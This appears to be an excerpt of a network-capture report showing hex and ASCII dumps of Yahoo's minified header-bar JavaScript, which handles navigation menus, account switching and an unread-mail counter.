                                                                                                                                                                        Data Ascii: reMenuItem=function(){var e=this.moreMenuLinkedList.shift();e&&(this.upDownMap.delete(e.data),this.leftRightMap.delete(e.data))},e.prototype._addEventListeners=function(){var e=this,n=delegate_1(this.options.containerElm,"a","keydown",(function(n){e._keyd
                                                                                                                                                                        2023-06-02 11:13:21 UTC566INData Raw: 72 65 63 74 69 6f 6e 2e 6e 65 78 74 3f 73 2e 67 65 74 48 65 61 64 28 29 3a 73 2e 67 65 74 54 61 69 6c 28 29 3b 72 26 26 22 6e 6f 6e 65 22 3d 3d 3d 77 69 6e 64 6f 77 2e 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 28 72 2e 64 61 74 61 29 2e 64 69 73 70 6c 61 79 3b 29 72 3d 72 5b 74 5d 3b 73 65 74 54 69 6d 65 6f 75 74 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 2e 6f 70 74 69 6f 6e 73 2e 65 6e 61 62 6c 65 4d 6f 72 65 4d 65 6e 75 26 26 69 2e 6f 70 74 69 6f 6e 73 2e 6d 6f 72 65 4d 65 6e 75 4e 61 76 45 6c 6d 26 26 22 2d 31 22 3d 3d 3d 28 6e 75 6c 6c 3d 3d 72 3f 76 6f 69 64 20 30 3a 72 2e 64 61 74 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 74 61 62 69 6e 64 65 78 22 29 29 3f 69 2e 6f 70 74 69 6f 6e 73 2e 6d 6f 72 65 4d 65 6e 75 4e 61 76 45 6c 6d 2e 66 6f
                                                                                                                                                                        Data Ascii: rection.next?s.getHead():s.getTail();r&&"none"===window.getComputedStyle(r.data).display;)r=r[t];setTimeout((function(){i.options.enableMoreMenu&&i.options.moreMenuNavElm&&"-1"===(null==r?void 0:r.data.getAttribute("tabindex"))?i.options.moreMenuNavElm.fo
                                                                                                                                                                        2023-06-02 11:13:21 UTC567INData Raw: 45 52 52 4f 52 3a 22 2c 6f 29 7d 74 26 26 63 61 6e 42 75 69 6c 64 41 63 63 53 77 69 74 63 68 65 72 4c 69 73 74 26 26 28 63 61 6e 42 75 69 6c 64 41 63 63 53 77 69 74 63 68 65 72 4c 69 73 74 3d 21 31 2c 65 2e 6f 6e 44 65 73 74 72 6f 79 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 63 61 6e 42 75 69 6c 64 41 63 63 53 77 69 74 63 68 65 72 4c 69 73 74 3d 21 30 7d 29 29 2c 62 75 69 6c 64 41 63 63 53 77 69 74 63 68 65 72 4c 69 73 74 28 65 2c 6e 2c 69 29 29 7d 2c 75 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 2c 6e 3b 30 3d 3d 3d 76 69 73 69 62 69 6c 69 74 79 54 72 61 63 6b 69 6e 67 26 26 28 76 69 73 69 62 69 6c 69 74 79 54 72 61 63 6b 69 6e 67 3d 31 2c 6e 75 6c 6c 3d 3d 3d 28 65 3d 6e 75 6c 6c 3d 3d 69 3f 76 6f 69 64 20 30 3a 69 2e 70 61 72 65 6e 74 4e 6f 64 65
                                                                                                                                                                        Data Ascii: ERROR:",o)}t&&canBuildAccSwitcherList&&(canBuildAccSwitcherList=!1,e.onDestroy((function(){canBuildAccSwitcherList=!0})),buildAccSwitcherList(e,n,i))},u=function(){var e,n;0===visibilityTracking&&(visibilityTracking=1,null===(e=null==i?void 0:i.parentNode
                                                                                                                                                                        2023-06-02 11:13:21 UTC568INData Raw: 73 69 67 6e 2d 69 6e 22 2c 70 61 72 61 6d 73 3d 7b 65 6c 6d 3a 22 73 69 67 6e 69 6e 22 2c 73 75 62 73 65 63 3a 22 73 65 74 74 69 6e 67 73 22 2c 69 74 63 3a 22 32 22 7d 29 2c 61 64 64 44 6f 6e 65 55 72 6c 54 6f 41 6c 6c 4c 69 6e 6b 28 6e 2c 65 29 29 3b 76 61 72 20 68 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 64 28 21 31 29 2c 65 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 6f 73 65 2d 61 6c 6c 2d 6d 65 6e 75 73 22 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 26 26 72 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 43 73 73 24 33 2e 73 68 6f 77 29 26 26 72 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 21 69 73 48 6f 76 65 72 65 64 28 72 2e 70 61 72 65 6e 74 4e 6f 64 65 29 26 26 66 28 29 7d 29 29 2c 65 2e 6f 6e 44 65 73 74 72 6f 79 28 28 66 75
                                                                                                                                                                        Data Ascii: sign-in",params={elm:"signin",subsec:"settings",itc:"2"}),addDoneUrlToAllLink(n,e));var h=function(){d(!1),e.addEventListener("close-all-menus",(function(){r&&r.classList.contains(Css$3.show)&&r.parentNode&&!isHovered(r.parentNode)&&f()})),e.onDestroy((fu
                                                                                                                                                                        2023-06-02 11:13:21 UTC570INData Raw: 6f 72 53 69 7a 65 28 6e 2e 73 69 7a 65 2c 74 29 7d 29 7d 29 29 7d 7d 3b 69 6e 69 74 4d 6f 64 75 6c 65 28 22 79 62 61 72 2d 61 63 63 6f 75 6e 74 2d 69 6e 69 74 22 2c 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 79 62 61 72 41 63 63 6f 75 6e 74 43 6f 6e 74 61 69 6e 65 72 22 29 2c 74 3d 7b 79 62 61 72 41 63 63 6f 75 6e 74 43 6f 6e 74 61 69 6e 65 72 3a 6e 2c 79 62 61 72 41 63 63 6f 75 6e 74 4d 65 6e 75 3a 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 79 62 61 72 41 63 63 6f 75 6e 74 4d 65 6e 75 22 29 2c 6c 6f 67 67 65 64 49 6e 55 73 65 72 3a 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 23 79 62 61 72 41 63 63
                                                                                                                                                                        Data Ascii: orSize(n.size,t)})}))}};initModule("ybar-account-init",(function(e){var n=document.getElementById("ybarAccountContainer"),t={ybarAccountContainer:n,ybarAccountMenu:document.getElementById("ybarAccountMenu"),loggedInUser:document.querySelectorAll("#ybarAcc
                                                                                                                                                                        2023-06-02 11:13:21 UTC571INData Raw: 37 61 69 22 7d 2c 4a 77 73 52 65 71 75 65 73 74 54 79 70 65 2c 4a 77 73 52 65 71 75 65 73 74 53 74 61 74 75 73 3b 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 5b 65 2e 43 4f 55 4e 54 3d 30 5d 3d 22 43 4f 55 4e 54 22 2c 65 5b 65 2e 50 52 45 56 49 45 57 3d 31 5d 3d 22 50 52 45 56 49 45 57 22 7d 28 4a 77 73 52 65 71 75 65 73 74 54 79 70 65 7c 7c 28 4a 77 73 52 65 71 75 65 73 74 54 79 70 65 3d 7b 7d 29 29 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 5b 65 2e 50 45 4e 44 49 4e 47 3d 30 5d 3d 22 50 45 4e 44 49 4e 47 22 2c 65 5b 65 2e 43 4f 4d 50 4c 45 54 45 3d 31 5d 3d 22 43 4f 4d 50 4c 45 54 45 22 7d 28 4a 77 73 52 65 71 75 65 73 74 53 74 61 74 75 73 7c 7c 28 4a 77 73 52 65 71 75 65 73 74 53 74 61 74 75 73 3d 7b 7d 29 29 3b 76 61 72 20 6a 77 73 43 61 63 68 65 3d 6e
                                                                                                                                                                        Data Ascii: 7ai"},JwsRequestType,JwsRequestStatus;!function(e){e[e.COUNT=0]="COUNT",e[e.PREVIEW=1]="PREVIEW"}(JwsRequestType||(JwsRequestType={})),function(e){e[e.PENDING=0]="PENDING",e[e.COMPLETE=1]="COMPLETE"}(JwsRequestStatus||(JwsRequestStatus={}));var jwsCache=n
                                                                                                                                                                        2023-06-02 11:13:21 UTC572INData Raw: 76 6f 69 64 20 30 3d 3d 3d 6e 3f 76 6f 69 64 20 30 3a 6e 2e 76 61 6c 75 65 29 7c 7c 22 22 2c 74 68 69 73 2e 61 70 70 69 64 3d 74 29 2c 74 7d 2c 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 77 69 6e 64 6f 77 2e 59 42 41 52 3d 77 69 6e 64 6f 77 2e 59 42 41 52 7c 7c 7b 7d 2c 77 69 6e 64 6f 77 2e 59 42 41 52 2e 61 70 70 69 64 3d 65 7c 7c 22 22 7d 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 31 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 29 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 66 65 74 63 68 43 6f 75 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 5f 5f 61 77 61 69 74 65 72 28 74 68 69 73 2c 76 6f 69 64 20 30 2c 76 6f 69 64 20 30 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 2c 74 2c 69 2c 6f 3d 74 68 69 73 3b 72 65 74 75 72 6e
                                                                                                                                                                        Data Ascii: void 0===n?void 0:n.value)||"",this.appid=t),t},set:function(e){window.YBAR=window.YBAR||{},window.YBAR.appid=e||""},enumerable:!1,configurable:!0}),e.prototype.fetchCount=function(e){return __awaiter(this,void 0,void 0,(function(){var n,t,i,o=this;return
                                                                                                                                                                        2023-06-02 11:13:21 UTC574INData Raw: 70 6f 6e 65 6e 74 28 65 29 2c 22 3d 22 29 2e 63 6f 6e 63 61 74 28 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 6e 29 29 29 7d 29 29 2c 6d 3d 66 2e 6c 65 6e 67 74 68 3f 22 3f 22 2e 63 6f 6e 63 61 74 28 66 2e 6a 6f 69 6e 28 22 26 22 29 29 3a 22 22 2c 68 3d 22 68 74 74 70 73 3a 2f 2f 61 70 69 73 2e 6d 61 69 6c 2e 79 61 68 6f 6f 2e 63 6f 6d 2f 77 73 2f 76 33 2f 62 61 74 63 68 22 2e 63 6f 6e 63 61 74 28 6d 29 2c 77 2e 6c 61 62 65 6c 3d 31 3b 63 61 73 65 20 31 3a 72 65 74 75 72 6e 20 77 2e 74 72 79 73 2e 70 75 73 68 28 5b 31 2c 34 2c 2c 35 5d 29 2c 5b 34 2c 79 62 61 72 46 65 74 63 68 28 68 2c 7b 6d 65 74 68 6f 64 3a 22 50 4f 53 54 22 2c 62 6f 64 79 3a 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 72 29 2c 63 72 65 64 65 6e 74 69 61 6c 73 3a 22 69 6e
                                                                                                                                                                        Data Ascii: ponent(e),"=").concat(encodeURIComponent(n)))})),m=f.length?"?".concat(f.join("&")):"",h="https://apis.mail.yahoo.com/ws/v3/batch".concat(m),w.label=1;case 1:return w.trys.push([1,4,,5]),[4,ybarFetch(h,{method:"POST",body:JSON.stringify(r),credentials:"in
                                                                                                                                                                        2023-06-02 11:13:21 UTC575INData Raw: 76 6f 69 64 20 30 3d 3d 3d 74 3f 76 6f 69 64 20 30 3a 74 2e 72 65 73 75 6c 74 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 69 3f 76 6f 69 64 20 30 3a 69 2e 64 65 63 6f 73 29 7c 7c 5b 5d 29 2e 66 69 6e 64 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 22 46 54 49 22 3d 3d 3d 28 6e 75 6c 6c 3d 3d 65 3f 76 6f 69 64 20 30 3a 65 2e 69 64 29 7d 29 29 3b 72 65 74 75 72 6e 20 61 26 26 6e 75 6c 6c 21 3d 3d 28 72 3d 6e 75 6c 6c 3d 3d 3d 28 73 3d 6e 75 6c 6c 3d 3d 3d 28 6f 3d 6e 75 6c 6c 3d 3d 61 3f 76 6f 69 64 20 30 3a 61 2e 63 6f 75 6e 74 73 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 6f 3f 76 6f 69 64 20 30 3a 6f 5b 30 5d 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 73 3f 76 6f 69 64 20 30 3a 73 2e 75 6e 73 65 65 6e 29 26 26 76 6f 69 64 20 30 21 3d 3d 72 3f 72 3a 30 7d 2c 65
                                                                                                                                                                        Data Ascii: void 0===t?void 0:t.result)||void 0===i?void 0:i.decos)||[]).find((function(e){return"FTI"===(null==e?void 0:e.id)}));return a&&null!==(r=null===(s=null===(o=null==a?void 0:a.counts)||void 0===o?void 0:o[0])||void 0===s?void 0:s.unseen)&&void 0!==r?r:0},e
                                                                                                                                                                        2023-06-02 11:13:21 UTC576INData Raw: 2d 78 78 78 78 2d 30 39 78 78 2d 78 78 78 78 78 78 78 78 78 78 30 30 22 2e 72 65 70 6c 61 63 65 28 6e 65 77 20 52 65 67 45 78 70 28 22 78 22 2c 22 67 22 29 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 3d 28 65 2b 31 36 2a 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 29 25 31 36 7c 30 3b 72 65 74 75 72 6e 20 65 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 65 2f 31 36 29 2c 6e 2e 74 6f 53 74 72 69 6e 67 28 31 36 29 7d 29 29 7d 2c 65 7d 28 29 2c 69 6e 69 74 24 32 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 29 7b 76 61 72 20 74 3d 6e 2e 6d 61 69 6c 4d 6f 64 75 6c 65 2c 69 3d 6e 2e 6d 61 69 6c 4c 69 6e 6b 2c 6f 3d 6e 2e 6d 61 69 6c 53 69 67 6e 69 6e 4c 69 6e 6b 2c 73 3d 6e 2e 6d 61 69 6c 50 72 65 76 69 65 77 3b 69 66 28 74 29 7b 76 61 72 20 72 3d 6e 65 77 20 4a 77 73 3b
                                                                                                                                                                        Data Ascii: -xxxx-09xx-xxxxxxxxxx00".replace(new RegExp("x","g"),(function(){var n=(e+16*Math.random())%16|0;return e=Math.floor(e/16),n.toString(16)}))},e}(),init$2=function(e,n){var t=n.mailModule,i=n.mailLink,o=n.mailSigninLink,s=n.mailPreview;if(t){var r=new Jws;
                                                                                                                                                                        2023-06-02 11:13:21 UTC577INData Raw: 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 74 29 7b 76 61 72 20 69 3d 6e 2e 6d 61 69 6c 55 6e 72 65 61 64 2c 6f 3d 6e 2e 6d 61 69 6c 55 6e 72 65 61 64 53 70 61 6e 3b 74 2e 66 65 74 63 68 43 6f 75 6e 74 28 29 2e 74 68 65 6e 28 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 69 66 28 69 26 26 6e 3e 30 29 7b 69 66 28 69 2e 73 74 79 6c 65 2e 76 69 73 69 62 69 6c 69 74 79 3d 22 76 69 73 69 62 6c 65 22 2c 6f 29 7b 76 61 72 20 74 3d 6e 3e 39 39 3b 6f 2e 74 65 78 74 43 6f 6e 74 65 6e 74 3d 74 3f 22 39 39 2b 22 3a 6e 2b 22 22 7d 65 2e 6f 6e 44 65 73 74 72 6f 79 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 2e 73 74 79 6c 65 2e 76 69 73 69 62 69 6c 69 74 79 3d 22 68 69 64 64 65 6e 22 2c 6f 26 26 28 6f 2e 74 65 78 74 43 6f 6e 74 65 6e 74 3d 22 22 29 7d 29 29 7d 7d 29 29 2e 63 61 74
                                                                                                                                                                        Data Ascii: function(e,n,t){var i=n.mailUnread,o=n.mailUnreadSpan;t.fetchCount().then((function(n){if(i&&n>0){if(i.style.visibility="visible",o){var t=n>99;o.textContent=t?"99+":n+""}e.onDestroy((function(){i.style.visibility="hidden",o&&(o.textContent="")}))}})).cat
                                                                                                                                                                        2023-06-02 11:13:21 UTC579INData Raw: 76 69 67 61 74 69 6f 6e 22 3a 22 5f 79 62 5f 31 6b 69 6b 78 22 2c 22 6d 6f 72 65 2d 6d 65 6e 75 2d 6e 61 76 2d 69 74 65 6d 22 3a 22 5f 79 62 5f 70 6f 39 37 30 22 2c 22 64 72 6f 70 2d 64 6f 77 6e 2d 6d 6f 64 61 6c 22 3a 22 5f 79 62 5f 31 6c 63 30 6a 22 2c 22 64 72 6f 70 64 6f 77 6e 2d 63 6c 6f 73 65 22 3a 22 5f 79 62 5f 6c 37 65 74 67 22 7d 2c 73 68 6f 77 4d 61 69 6c 55 6e 72 65 61 64 43 6f 75 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 23 79 62 61 72 2d 6e 61 76 69 67 61 74 69 6f 6e 2d 69 74 65 6d 2d 6d 61 69 6c 22 29 2c 74 3d 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 23 79 62 61 72 2d 6e 61 76 69 67 61 74 69 6f 6e 2d 69 74 65 6d 2d 6d
                                                                                                                                                                        Data Ascii: vigation":"_yb_1kikx","more-menu-nav-item":"_yb_po970","drop-down-modal":"_yb_1lc0j","dropdown-close":"_yb_l7etg"},showMailUnreadCount=function(e){var n=document.querySelector("#ybar-navigation-item-mail"),t=document.querySelector("#ybar-navigation-item-m
                                                                                                                                                                        2023-06-02 11:13:21 UTC580INData Raw: 6f 3d 6f 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 2e 22 2e 63 6f 6e 63 61 74 28 6e 2e 6e 61 76 69 67 61 74 69 6f 6e 44 72 6f 70 64 6f 77 6e 4c 69 73 74 43 6c 61 73 73 29 29 29 2c 6f 29 7b 6f 2e 73 74 79 6c 65 2e 72 65 6d 6f 76 65 50 72 6f 70 65 72 74 79 28 22 6c 65 66 74 22 29 2c 6e 2e 73 68 69 66 74 4d 6f 72 65 4d 65 6e 75 45 6e 61 62 6c 65 64 26 26 6f 2e 73 74 79 6c 65 2e 72 65 6d 6f 76 65 50 72 6f 70 65 72 74 79 28 22 6d 61 72 67 69 6e 2d 6c 65 66 74 22 29 2c 6e 2e 73 68 69 66 74 4d 6f 72 65 4d 65 6e 75 45 6e 61 62 6c 65 64 26 26 6d 61 72 67 69 6e 4c 65 66 74 4f 66 66 73 65 74 26 26 28 6f 2e 73 74 79 6c 65 2e 6d 61 72 67 69 6e 4c 65 66 74 3d 6d 61 72 67 69 6e 4c 65 66 74 4f 66 66 73 65 74 2b 22 70 78 22 29 3b 76 61 72 20 73 3d 6f 2e 67 65 74 42
                                                                                                                                                                        Data Ascii: o=o.querySelector(".".concat(n.navigationDropdownListClass))),o){o.style.removeProperty("left"),n.shiftMoreMenuEnabled&&o.style.removeProperty("margin-left"),n.shiftMoreMenuEnabled&&marginLeftOffset&&(o.style.marginLeft=marginLeftOffset+"px");var s=o.getB
                                                                                                                                                                        2023-06-02 11:13:21 UTC581INData Raw: 64 6f 77 6e 2e 66 69 72 73 74 43 68 69 6c 64 29 2c 74 2e 73 68 69 66 74 4d 6f 72 65 4d 65 6e 75 49 74 65 6d 28 29 2c 6e 75 6c 6c 3d 3d 3d 28 69 3d 65 2e 6e 61 76 49 74 65 6d 73 5b 68 5d 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 61 22 29 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 69 7c 7c 69 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 74 61 62 69 6e 64 65 78 22 2c 22 30 22 29 2c 68 2b 2b 3b 6d 6f 72 65 4d 65 6e 75 49 6e 64 65 78 3d 2d 31 2c 65 2e 6e 61 76 4c 69 73 74 26 26 28 65 2e 6e 61 76 4c 69 73 74 2e 73 74 79 6c 65 2e 6d 61 78 57 69 64 74 68 3d 22 6e 6f 6e 65 22 29 7d 69 66 28 2d 31 21 3d 3d 72 26 26 72 21 3d 3d 6d 6f 72 65 4d 65 6e 75 49 6e 64 65 78 29 7b 69 66 28 72 3e 6d 6f 72 65 4d 65 6e 75 49 6e 64 65 78 26 26 2d 31 21 3d 3d 6d 6f 72 65 4d 65 6e
                                                                                                                                                                        Data Ascii: down.firstChild),t.shiftMoreMenuItem(),null===(i=e.navItems[h].querySelector("a"))||void 0===i||i.setAttribute("tabindex","0"),h++;moreMenuIndex=-1,e.navList&&(e.navList.style.maxWidth="none")}if(-1!==r&&r!==moreMenuIndex){if(r>moreMenuIndex&&-1!==moreMen
                                                                                                                                                                        2023-06-02 11:13:21 UTC581INData Raw: 72 20 67 3d 6d 6f 72 65 4d 65 6e 75 49 6e 64 65 78 3b 67 3c 72 26 26 65 2e 6d 6f 72 65 4d 65 6e 75 44 72 6f 70 64 6f 77 6e 26 26 65 2e 6d 6f 72 65 4d 65 6e 75 44 72 6f 70 64 6f 77 6e 2e 68 61 73 43 68 69 6c 64 4e 6f 64 65 73 28 29 26 26 65 2e 6d 6f 72 65 4d 65 6e 75 44 72 6f 70 64 6f 77 6e 2e 66 69 72 73 74 43 68 69 6c 64 3b 29 65 2e 6d 6f 72 65 4d 65 6e 75 44 72 6f 70 64 6f 77 6e 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 65 2e 6d 6f 72 65 4d 65 6e 75 44 72 6f 70 64 6f 77 6e 2e 66 69 72 73 74 43 68 69 6c 64 29 2c 74 2e 73 68 69 66 74 4d 6f 72 65 4d 65 6e 75 49 74 65 6d 28 29 2c 6e 75 6c 6c 3d 3d 3d 28 6f 3d 65 2e 6e 61 76 49 74 65 6d 73 5b 67 5d 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 61 22 29 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 6f 7c 7c 6f 2e 73 65
                                                                                                                                                                        Data Ascii: r g=moreMenuIndex;g<r&&e.moreMenuDropdown&&e.moreMenuDropdown.hasChildNodes()&&e.moreMenuDropdown.firstChild;)e.moreMenuDropdown.removeChild(e.moreMenuDropdown.firstChild),t.shiftMoreMenuItem(),null===(o=e.navItems[g].querySelector("a"))||void 0===o||o.se
                                                                                                                                                                        2023-06-02 11:13:21 UTC583INData Raw: 69 73 69 62 69 6c 69 74 79 3d 22 76 69 73 69 62 6c 65 22 29 3a 6e 75 6c 6c 21 3d 3d 65 2e 6d 6f 72 65 4d 65 6e 75 4e 61 76 49 74 65 6d 26 26 28 65 2e 6d 6f 72 65 4d 65 6e 75 4e 61 76 49 74 65 6d 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 65 2e 64 72 6f 70 64 6f 77 6e 57 72 61 70 70 65 72 43 6c 61 73 73 29 2c 65 2e 6d 6f 72 65 4d 65 6e 75 4e 61 76 49 74 65 6d 2e 73 74 79 6c 65 2e 76 69 73 69 62 69 6c 69 74 79 3d 22 68 69 64 64 65 6e 22 29 2c 65 2e 6d 6f 72 65 4d 65 6e 75 44 72 6f 70 64 6f 77 6e 26 26 65 2e 6d 6f 72 65 4d 65 6e 75 44 72 6f 70 64 6f 77 6e 2e 63 68 69 6c 64 45 6c 65 6d 65 6e 74 43 6f 75 6e 74 3e 4d 4f 52 45 5f 4d 45 4e 55 5f 4c 4f 4e 47 5f 4c 49 53 54 5f 43 4f 55 4e 54 3f 65 2e 6d 6f 72 65 4d 65 6e 75 44 72 6f 70 64 6f 77 6e 2e 63
                                                                                                                                                                        Data Ascii: isibility="visible"):null!==e.moreMenuNavItem&&(e.moreMenuNavItem.classList.remove(e.dropdownWrapperClass),e.moreMenuNavItem.style.visibility="hidden"),e.moreMenuDropdown&&e.moreMenuDropdown.childElementCount>MORE_MENU_LONG_LIST_COUNT?e.moreMenuDropdown.c
                                                                                                                                                                        2023-06-02 11:13:21 UTC584INData Raw: 70 72 65 61 64 41 72 72 61 79 28 5b 5d 2c 5f 5f 72 65 61 64 28 6e 75 6c 6c 3d 3d 3d 28 65 3d 6e 2e 79 62 61 72 4e 61 76 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 65 3f 76 6f 69 64 20 30 3a 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 2e 22 2e 63 6f 6e 63 61 74 28 6e 2e 64 72 6f 70 64 6f 77 6e 4f 70 65 6e 43 6c 61 73 73 29 29 29 2c 21 31 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 6e 2e 64 72 6f 70 64 6f 77 6e 4f 70 65 6e 43 6c 61 73 73 29 3b 76 61 72 20 74 3d 64 6f 63 75 6d 65 6e 74 2e 61 63 74 69 76 65 45 6c 65 6d 65 6e 74 3b 6e 6f 64 65 43 6f 6e 74 61 69 6e 73 28 6e 2e 79 62 61 72 4e 61 76 2c 74 29 26 26 73 65 74 54 69 6d 65 6f 75 74 28 28 66 75 6e 63 74 69 6f 6e
                                                                                                                                                                        Data Ascii: preadArray([],__read(null===(e=n.ybarNav)||void 0===e?void 0:e.querySelectorAll(".".concat(n.dropdownOpenClass))),!1).forEach((function(e){e.classList.remove(n.dropdownOpenClass);var t=document.activeElement;nodeContains(n.ybarNav,t)&&setTimeout((function
                                                                                                                                                                        2023-06-02 11:13:21 UTC585INData Raw: 21 28 6e 2e 73 68 69 66 74 4d 6f 72 65 4d 65 6e 75 45 6e 61 62 6c 65 64 26 26 6e 2e 69 73 46 75 6a 69 32 26 26 6e 2e 6e 61 76 4c 69 73 74 26 26 6e 2e 6e 61 76 49 74 65 6d 73 26 26 6e 2e 6e 61 76 49 74 65 6d 73 2e 6c 65 6e 67 74 68 3e 30 29 2c 73 3d 6e 65 77 20 41 31 31 79 4e 61 76 69 67 61 74 69 6f 6e 28 65 2c 7b 63 6f 6e 74 61 69 6e 65 72 45 6c 6d 3a 6e 2e 79 62 61 72 4e 61 76 2c 6e 61 76 6c 69 73 74 49 74 65 6d 53 65 6c 65 63 74 6f 72 3a 22 2e 22 2e 63 6f 6e 63 61 74 28 43 73 73 24 31 5b 22 79 62 61 72 2d 70 61 72 65 6e 74 2d 6e 61 76 69 67 61 74 69 6f 6e 22 5d 2c 22 20 3e 20 6c 69 22 29 2c 64 72 6f 70 64 6f 77 6e 43 6c 61 73 73 3a 6e 2e 64 72 6f 70 64 6f 77 6e 57 72 61 70 70 65 72 43 6c 61 73 73 2c 65 6e 61 62 6c 65 4d 6f 72 65 4d 65 6e 75 3a 6f 2c 6d
                                                                                                                                                                        Data Ascii: !(n.shiftMoreMenuEnabled&&n.isFuji2&&n.navList&&n.navItems&&n.navItems.length>0),s=new A11yNavigation(e,{containerElm:n.ybarNav,navlistItemSelector:".".concat(Css$1["ybar-parent-navigation"]," > li"),dropdownClass:n.dropdownWrapperClass,enableMoreMenu:o,m
                                                                                                                                                                        2023-06-02 11:13:21 UTC586INData Raw: 61 72 20 65 3d 63 2e 70 61 72 65 6e 74 4e 6f 64 65 3b 6e 75 6c 6c 3d 3d 65 7c 7c 65 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 63 29 2c 6c 2e 64 65 73 74 72 6f 79 28 29 7d 29 29 7d 7d 2c 53 45 4c 45 43 54 4f 52 5f 4d 4f 52 45 5f 4d 45 4e 55 3d 22 23 79 62 61 72 2d 6e 61 76 2d 6d 6f 72 65 2d 6d 65 6e 75 22 3b 69 6e 69 74 4d 6f 64 75 6c 65 28 22 79 62 61 72 2d 6d 6f 64 2d 6e 61 76 69 67 61 74 69 6f 6e 22 2c 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 2c 74 3d 7b 64 72 6f 70 64 6f 77 6e 57 72 61 70 70 65 72 43 6c 61 73 73 3a 43 73 73 24 31 5b 22 64 72 6f 70 64 6f 77 6e 2d 77 72 61 70 70 65 72 22 5d 2c 69 73 46 75 6a 69 32 3a 6e 75 6c 6c 21 3d 3d 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 2e 79 62 61 72 2d 79 74 68 65 6d 65
                                                                                                                                                                        Data Ascii: ar e=c.parentNode;null==e||e.removeChild(c),l.destroy()}))}},SELECTOR_MORE_MENU="#ybar-nav-more-menu";initModule("ybar-mod-navigation",(function(e){var n,t={dropdownWrapperClass:Css$1["dropdown-wrapper"],isFuji2:null!==document.querySelector(".ybar-ytheme
                                                                                                                                                                        2023-06-02 11:13:21 UTC588INData Raw: 73 73 24 31 5b 22 79 62 61 72 2d 6e 61 76 69 67 61 74 69 6f 6e 2d 69 74 65 6d 22 5d 2c 64 72 6f 70 64 6f 77 6e 4f 70 65 6e 43 6c 61 73 73 3a 43 73 73 24 31 5b 22 64 72 6f 70 64 6f 77 6e 2d 6f 70 65 6e 22 5d 2c 6e 61 76 69 67 61 74 69 6f 6e 50 6c 61 63 65 6d 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 7c 7c 28 6e 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 79 62 61 72 2d 6e 61 76 2d 70 6c 61 63 65 6d 65 6e 74 22 29 29 2c 6e 7d 7d 3b 74 2e 79 62 61 72 4e 61 76 26 26 69 6e 69 74 24 31 28 65 2c 74 29 7d 29 29 3b 76 61 72 20 43 73 73 3d 7b 22 6e 6f 74 69 66 69 63 61 74 69 6f 6e 2d 63 6f 6e 74 61 69 6e 65 72 2d 2d 6e 6f 2d 68 69 73 74 6f 72 79 22 3a 22 5f 79 62 5f 70 79 30 64 66 22 2c 22 74 6f 6f 6c 74
